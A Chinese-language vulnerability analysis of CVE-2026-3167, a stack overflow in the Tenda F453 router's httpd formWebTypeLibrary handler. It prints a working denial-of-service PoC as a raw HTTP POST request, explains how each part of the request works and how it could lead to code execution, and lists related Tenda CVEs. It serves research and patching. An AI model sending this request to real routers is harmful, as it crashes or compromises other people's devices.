文章总结： 文档分析了TendaF453路由器CVE-2026-3167高危漏洞，成因是httpd组件formWebTypeLibrary函数未校验webSiteId参数长度引发栈溢出。攻击者利用公开PoC发送超长POST请求可致拒绝服务或远程代码执行。文章还汇总了近期多款同类路由器漏洞，建议用户更新固件并限制管理接口访问。 综合评分： 82 文章分类： 漏洞分析,IoT安全,漏洞POC,漏洞预警

Tenda F453路由器高危漏洞

zere zere

船山信安

2026年3月2日 12:15 广东

Tenda F453路由器高危漏洞分析

漏洞背景

近日，Li Tengzheng（LtzHust） 披露了 Tenda F453 路由器固件版本 V1.0.0.3 中的一个高危缓冲区溢出漏洞，编号 CVE-2026-3167。该漏洞在 httpd 组件的 /goform/webtypelibrary ， formWebTypeLibrary函数中，发现webSiteId用户参数输入时，缺乏长度检查，容易使远程攻击者发送特制请求让远程代码执行。

漏洞详情

| 项目 | 内容 | | — | — | | CVE编号 | CVE-2026-3167 | | 厂商 | Tenda | | 产品 | F453 路由器 | | 受影响版本 | V1.0.0.3 | | 漏洞类型 | 缓冲区溢出 (CWE-120) | | 受影响组件 | httpd (Web服务器) | | 漏洞文件/函数 | /goform/webtypelibrary / formWebTypeLibrary | | 危险参数 | webSiteId | | 攻击向量 | 远程网络请求（POST） | | 后果 | 拒绝服务 / 远程代码执行 | | 利用状态 | PoC 已公开 | | 固件下载 | Tenda官方支持 |

漏洞原理分析

漏洞函数与参数

在 httpd 的 formWebTypeLibrary 函数中，程序从用户POST请求中获取参数 webSiteId，然后将其复制到一个固定大小的栈缓冲区中，未做任何长度校验。如果输入长度超出缓冲区大小(64字节)，就会覆盖栈上的相邻数据，包括局部变量、帧指针和函数返回地址。

PoC 代码请求

下面为公开的PoC请求：

POST /goform/webtypelibrary HTTP/1.1
Host: 192.168.6.2
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Referer: http://192.168.6.2/index.asp
Accept-Encoding: gzip, deflate, br
Cookie: user=
Connection: keep-alive
Content-Length: 410

webSiteId=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

如果将请求发送至路由器，超长的 webSiteId 参数（约400个 a）就会被复制到栈缓冲区，导致栈溢出，即httpd 进程崩溃（拒绝服务）。

PoC 构造原理分析

• • POST 方法：漏洞函数只响应POST请求，保证参数能通过请求体传递。
• • 请求头伪装：包含 X-Requested-With、Referer 等头部，使请求看起来来自合法管理页面，可能绕过简单的访问检查。
• • 超长数据：400个 a 超过目标缓冲区（64字节）大小，确保覆盖返回地址。
• • 单一字符 a：方便崩溃后通过调试确认内存被 0x61填满，验证漏洞存在。

攻击者如果将 a替换自己设置的 payload，可能会控制返回地址，实现其任意代码执行。

多款高危漏洞集中

通过相关的收集，这些漏洞都有共同的特征：主要都是位于路由器的httpd组件中，发现的大部分漏洞类型均为缓冲区溢出（CWE-120）。部分代码详情，细节分析已经公开，风险程度会高一些。下面表格中汇总了近期相关的漏洞信息：

| CVE 编号 | 受影响组件/函数 | 危险等级 (CVSS) | 发现/提交者 | | — | — | — | — | | CVE-2026-3165 | /goform/AdvSetWrlsafeset 文件中的 fromSetWifiGusetBasic 函数 | 高危 | 未明确 | | CVE-2026-3166 | /goform/RouteStatic 文件中的 fromRouteStatic 函数 | 高危 | 未明确 | | CVE-2026-3167 | /goform/webtypelibrary 文件中的 formWebTypeLibrary 函数 | 高危 | LtzHust | | CVE-2026-3274 | /goform/L7Prot 文件中的 frmL7ProtForm 函数 | 高危 | VulDB | | CVE-2026-3275 | /goform/addressNat 文件中的 fromAddressNat 函数 | 高危 | LtzHust2 | | CVE-2026-3376 | /goform/SafeMacFilter 文件中的 fromSafeMacFilter 函数 | 高危 | LtzHust2 | | CVE-2026-3378 | /goform/qossetting文件中的 fromqossetting 函数 | 高危 | LtzHust2 | | CVE-2026-3379 | /goform/SetIpBind 文件中的 fromSetIpBind 函数 | 高危 | LtzHust2 |

总结

CVE-2026-3167 是一个典型的嵌入式设备缓冲区溢出漏洞，通过公开的 PoC，攻击者可能会导致服务崩溃，如果再结合 ROP 相关技术，可能会达到获取设备的权限。

本文仅用于安全研究和学习，请勿用于非法用途。

参考链接

• • NVD – CVE-2026-3167
• • VulDB – VDB-347674
• • GitHub 分析
• • Tenda 官方

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：船山信安 zere zere《Tenda F453路由器高危漏洞》